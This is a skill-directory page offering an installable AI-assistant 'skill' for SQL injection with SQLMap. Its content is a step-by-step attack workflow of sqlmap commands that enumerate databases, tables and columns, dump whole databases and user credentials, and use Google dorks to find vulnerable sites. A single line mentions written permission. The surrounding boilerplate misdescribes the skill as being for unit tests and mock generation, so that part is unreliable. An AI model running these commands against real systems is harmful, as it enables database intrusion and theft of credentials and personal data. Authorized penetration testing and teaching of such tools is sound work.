Sqlmap Database Pentesting
Sqlmap Database Pentesting is an code AI skill with a core value of This skill should be used when the user asks to \"automate SQL injection testing,\" \"enumerate database structure,\" \"extract database credentials using sqlmap,\" \"dump tables and columns. It
helps developers solve real-world problems in the code domain, boosting
efficiency, automating repetitive tasks, and optimizing workflows.
This skill should be used when the user asks to \"automate SQL injection testing,\" \"enumerate database structure,\" \"extract database credentials using sqlmap,\" \"dump tables and columns...
Quick Facts
mkdir -p ./skills/sqlmap-database-pentesting && curl -sfL https://raw.githubusercontent.com/sickn33/antigravity-awesome-skills/main/skills/sqlmap-database-pentesting/SKILL.md -o ./skills/sqlmap-database-pentesting/SKILL.md Run in terminal / PowerShell. Requires curl (Unix) or PowerShell 5+ (Windows).
Skill Content
# SQLMap Database Penetration Testing
Purpose
Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
Inputs / Prerequisites
- **Target URL**: Web application URL with injectable parameter (e.g., `?id=1`)
- **SQLMap Installation**: Pre-installed on Kali Linux or downloaded from GitHub
- **Verified Injection Point**: URL parameter confirmed or suspected to be SQL injectable
- **Request File (Optional)**: Burp Suite captured HTTP request for POST-based injection
- **Authorization**: Written permission for penetration testing activities
Outputs / Deliverables
- **Database Enumeration**: List of all databases on the target server
- **Table Structure**: Complete table names within target database
- **Column Mapping**: Column names and data types for each table
- **Extracted Data**: Dumped records including usernames, passwords, and sensitive data
- **Hash Values**: Password hashes for offline cracking
- **Vulnerability Report**: Confirmation of SQL injection type and severity
Core Workflow
1. Identify SQL Injection Vulnerability
#### Manual Verification
# Add single quote to break query
http://target.com/page.php?id=1'
# If error message appears, likely SQL injectable
# Error example: "You have an error in your SQL syntax"#### Initial SQLMap Scan
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch
# With verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 32. Enumerate Databases
#### List All Databases
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch**Key Options:**
- `-u`: Target URL with injectable parameter
- `--dbs`: Enumerate database names
- `--batch`: Use default answers (non-interactive mode)
3. Enumerate Tables
#### List Tables in Specific Database
sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch**Key Options:**
- `-D`: Specify target database name
- `--tables`: Enumerate table names
4. Enumerate Columns
#### List Columns in Specific Table
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch**Key Options:**
- `-T`: Specify target table name
- `--columns`: Enumerate column names
5. Extract Data
#### Dump Specific Table Data
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch#### Dump Specific Columns
sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch#### Dump Entire Database
sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch**Key Options:**
- `--dump`: Extract all data from specified table
- `--dump-all`: Extract all data from all tables
- `-C`: Specify column names to extract
6. Advanced Target Options
#### Target from HTTP Request File
# Save Burp Suite request to file, then:
sqlmap -r /path/to/request.txt --dbs --batch#### Target from Log File
# Feed log file with multiple requests
sqlmap -l /path/to/logfile --dbs --batch#### Target Multiple URLs (Bulk File)
# Create file with URLs, one per line:
# http://target1.com/page.php?id=1
# http://target2.com/page.php?id=2
sqlmap -m /path/to/bulkfile.txt --dbs --batch#### Target via Google Dorks (Use with Caution)
# Automatically find and test vulnerable sites (LEGAL TARGETS ONLY)
sqlmap -g "inurl:?id= site:yourdomain.com" --batchQuick Reference Commands
Database Enumeration Progression
| Stage | Command |
|-------|---------|
| List Databases | `sqlmap -u "URL" --dbs --batch` |
| List Tables | `sqlmap -u "URL" -
🎯 Best For
- QA engineers
- Developers writing unit tests
- Claude users
- Software engineers
- Development teams
💡 Use Cases
- Generating test cases for edge conditions
- Writing integration test suites
- Code quality improvement
- Best practice enforcement
📖 How to Use This Skill
- 1
Install the Skill
Copy the install command from the Terminal tab and run it. The SKILL.md file downloads to your local skills directory.
- 2
Load into Your AI Assistant
Open Claude and reference the skill. Paste the SKILL.md content or use the system prompt tab.
- 3
Apply Sqlmap Database Pentesting to Your Work
Open your project in the AI assistant and ask it to apply the skill. Start with a small module to verify the output quality.
- 4
Review and Refine
Review AI suggestions before committing. Run tests, check for regressions, and iterate on the skill output.
❓ Frequently Asked Questions
Does this generate test mocks?
Many testing skills include mock generation. Check the install command and skill content for details.
Is Sqlmap Database Pentesting compatible with Cursor and VS Code?
Yes — this skill works with any AI coding assistant including Cursor, VS Code with Copilot, and JetBrains IDEs.
Do I need specific dependencies for Sqlmap Database Pentesting?
Check the install command and Works With section. Most code skills only require the AI assistant and your codebase.
How do I install Sqlmap Database Pentesting?
Copy the install command from the Terminal tab and run it. The skill downloads to ./skills/sqlmap-database-pentesting/SKILL.md, ready to use.
Can I customize this skill for my team?
Absolutely. Edit the SKILL.md file to add team-specific instructions, examples, or workflows.
⚠️ Common Mistakes to Avoid
Not testing edge cases
AI tends to generate happy-path tests. Manually review for boundary conditions.
Skipping validation
Always test AI-generated code changes, even for simple refactors.
Missing dependency updates
Check if the skill requires updated dependencies or new packages.